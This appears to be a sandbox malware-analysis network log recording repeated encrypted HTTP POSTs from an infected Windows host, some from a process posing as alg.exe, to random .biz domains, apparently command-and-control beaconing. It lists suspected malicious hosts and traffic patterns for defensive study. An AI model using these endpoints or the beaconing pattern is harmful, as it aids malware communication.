                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.130562067 CET778OUTData Raw: f3 61 c5 82 ba 39 f9 ec fe 02 00 00 dc 18 9b 4b 4d 66 e9 17 ab bf 9a 8a 96 b1 86 aa 6c 76 e4 44 88 6b 82 41 f3 87 d2 2d d7 c0 f7 5d da 3d b9 8e cc 06 e1 ca d5 01 47 5c 1a 8b 91 31 bc 75 ec 86 51 c8 f1 cd a0 52 f2 bd 6c b5 72 c7 88 3b 75 b6 90 77
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a9KMflvDkA-]=G\1uQRlr;uw$eG71K9MY28wGvr!Pn@81LX}T0G_pc=7g:[c{jr$A2)|9F<p?yv_R44]5)f\2F6'qX_r+
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.972781897 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9593da6cb14a3c8837049217c3cc60ce|155.94.241.187|1731920375|1731920375|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        129192.168.2.105010834.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.115287066 CET351OUTPOST /cetkmiomtp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.115287066 CET834OUTData Raw: f9 5f 4a 64 f7 4a 1a 80 36 03 00 00 18 75 b1 f4 11 48 eb 9c 7a e6 bc 8c 99 fa 45 6d ef 55 ce 10 58 a1 f7 6a db b4 7d bb d6 ba e4 eb 52 1a ab 07 fb 8f 80 84 a1 d0 32 b5 23 d9 66 7b 46 96 33 4b 62 1a 7f 02 00 27 ee 1a fa fc 24 3f b2 b8 10 72 2a d9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _JdJ6uHzEmUXj}R2#f{F3Kb'$?r*2g}ucaunZGEKvv~C.!Rx2<jc<2#0)T^Zr!irLJpLZ]Y#.{D6xy?Wne5e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.958697081 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=438a6020514eb9ea4f0ab6df6edb22ef|155.94.241.187|1731920376|1731920376|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        130192.168.2.105010954.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.172991991 CET356OUTPOST /qaurkicngfeyta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.173007965 CET778OUTData Raw: 66 4f 4b 9e 80 3e 03 22 fe 02 00 00 5f 9e 24 46 3c f1 74 ee 7d da c9 ce 03 65 0a 2f 3f 45 a7 df 6c f9 72 b8 c5 77 da af 1a ed 39 e5 98 c0 ec 6c ee 2c 2a 25 7e 63 3d 59 01 a6 51 91 59 a5 2e 88 66 a8 0a 09 be e7 3f e5 94 2d e6 34 03 74 eb 6d 54 74
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fOK>"_$F<t}e/?Elrw9l,*%~c=YQY.f?-4tmTt5-1&Q0`_!D,f)NUmp~QmzL!x%ie8 :` 1rTD(k$21dLU1'TV[/<rj'zDb.L}
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.018814087 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9e41c4446adb51c84a462f89abced68f|155.94.241.187|1731920376|1731920376|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        131192.168.2.105011047.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.979166985 CET346OUTPOST /rstn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.979301929 CET834OUTData Raw: 23 17 78 0b dc bb 5d 2b 36 03 00 00 ca 12 49 77 6f dd a9 9e 53 3a 8d 22 81 fd 6f 9b 94 7d f6 b4 bf e1 c8 76 f7 3e c6 86 a4 48 a7 28 1c b1 20 71 ab 4f 6e 38 c5 88 59 b7 d3 8c c3 80 e0 16 31 c3 27 79 ec 55 34 a7 50 8b 10 c1 1e da 69 93 40 a4 73 46
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: #x]+6IwoS:"o}v>H( qOn8Y1'yU4Pi@sFzMR-?@C4c%{b25}Bk&fgj>85^SA59SOIJN~9&m!_*grTsB|m{Ashz>I4iie
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.476994991 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ad3f3eac3761f174f766f80bd708b55f|155.94.241.187|1731920378|1731920378|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        132192.168.2.105011118.246.231.120807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316297054 CET346OUTPOST /kafps HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316323042 CET778OUTData Raw: 3c b5 0c 6e 06 31 46 f7 fe 02 00 00 31 7b a9 84 10 32 38 1a f2 13 7f c1 2a b7 7b 79 0e be f8 c5 c3 0e dc 5e 67 fc 4b c8 2d bf 94 d2 17 49 e9 bc 35 02 f0 21 a3 b6 af d3 ba 44 cc ce e2 1c 35 b3 47 1b 8c 84 6f 11 28 5f 70 d5 b0 22 96 9a 03 26 e8 51
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <n1F1{28*{y^gK-I5!D5Go(_p"&Q+Eo`YMl;)?lvSkJ[0^w.I}}u}xL3[:1OKn|s. ,JnGK+'=hr_@]o=<%o/wT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.162082911 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2cc779b7e696e3ea020fc76f52b42509|155.94.241.187|1731920378|1731920378|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        133192.168.2.105011218.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416376114 CET354OUTPOST /tfidpljjhw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416405916 CET778OUTData Raw: ad 8b 8f 54 85 a3 a3 46 fe 02 00 00 b8 a8 ee 2d 12 4c 47 0c c9 fe 81 56 01 ba e4 48 2e e3 c2 1c 27 72 5a 84 a0 b7 2e 7d 36 60 16 d9 84 40 bc 46 f6 60 3c 5a 16 29 a4 9c 0b 2c 0c 6f 88 14 8d c5 f2 c8 d4 bd fe e1 8d 8c 70 12 27 be 3c 47 27 3a 87 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: TF-LGVH.'rZ.}6`@F`<Z),op'<G':|(?mm|H~C-|J|Yk896<|HkQJ/o^N>J~78h;z11%s>(|>6zBy*GXK8JuX08Lz?[GN
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.091928005 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1325a4e98206430828d521252e18140c|155.94.241.187|1731920379|1731920379|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        134192.168.2.105011318.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495194912 CET355OUTPOST /fqteasckvt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495480061 CET834OUTData Raw: 79 cf dc fb 7b 55 e9 36 36 03 00 00 1c ca 80 c4 f1 e1 69 5a ae c9 c0 11 fd e0 06 50 3a 2c e6 7c 48 1c 80 41 6b 95 93 6a 01 a7 7f 42 bc 57 08 b2 4a 3c 15 10 bd 56 5b 07 3e 15 9a 03 da 96 e4 cb bc 2c c8 21 14 c8 98 19 09 ad 15 7b 3f 91 60 08 be ab
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y{U66iZP:,|HAkjBWJ<V[>,!{?`+5j<D^sSc=:NV:oC3Kki3Vr[b>;~TW=FA{7!W#ie)J
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.169465065 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=bb700ede9bb6d36bdb010367f1ec37e7|155.94.241.187|1731920379|1731920379|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        135192.168.2.105011413.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196141958 CET344OUTPOST /bj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196160078 CET834OUTData Raw: 71 f0 8c 18 45 80 fe a4 36 03 00 00 73 5d a4 91 8f 25 c3 8b 81 87 79 47 57 5a f2 9c 05 de c0 bf cd 61 1c 86 67 0d af 91 9e 03 a9 65 e6 34 eb e6 66 dd 74 30 fa 04 04 73 1a 13 f9 30 44 3f b7 cf 49 27 fd 2d 3e b3 5b 7f 9e f8 f4 9b fb 5c 9a 98 f8 a6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qE6s]%yGWZage4ft0s0D?I'->[\fg@Ffr{Z~M?RHKULP5dt2aw\[eNq<f2YSZreq0gw;dxjdOi>BR9%5QFoO^/"}J
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.632520914 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=795f2922e43c562f4e65f04f5a347424|155.94.241.187|1731920380|1731920380|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        136192.168.2.105011544.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369318008 CET352OUTPOST /ahrycwbcmx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369334936 CET778OUTData Raw: 20 92 18 a5 93 3b 5a 63 fe 02 00 00 2f 3f 66 81 81 1b 21 42 99 0f 1c ca 2f 7f 70 f5 93 5e e7 09 a0 70 b3 df 82 f0 b2 a3 90 22 76 86 9c 68 5e 9f 72 8d 8c ae 34 5a db 56 1b 2d 02 68 19 52 b9 6b 78 8b 58 b9 34 e2 5a e8 39 65 02 d9 86 26 e4 81 01 71
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;Zc/?f!B/p^p"vh^r4ZV-hRkxX4Z9e&q]d:"T2mo@Jb%($t}9bye[kb] a@$inSD2,1%#2u]N)_37A`F\W4s%i2/4P[q}JZ
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.034821033 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=399b747d6c9b09032fdd3a92ae66bf9a|155.94.241.187|1731920379|1731920379|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        137192.168.2.105011672.52.178.23807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.377171993 CET346OUTPOST /hg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.377193928 CET778OUTData Raw: 2d f0 61 d5 51 c0 7e 13 fe 02 00 00 83 22 65 8a 0a b3 4a e5 57 cc b0 57 e8 0b 9e 59 0e 7b 47 81 fe e4 7e 35 25 d7 52 a3 9d b2 33 40 68 dc ea bd 49 e4 1c a8 51 f1 13 8a d9 1b f0 ae 39 85 d1 88 b1 4d cd 66 cf 73 1f 8b aa a5 39 b1 6b 01 a4 ee 2d 34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -aQ~"eJWWY{G~5%R3@hIQ9Mfs9k-4XPH@#N~N"z[_dR->c^q6)b~8"TLk!cDM1x<XgM4zt^Tj+]@Z3LR*m`PMNceua


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        138192.168.2.105011734.246.200.16080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655626059 CET356OUTPOST /suewswdbcoj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
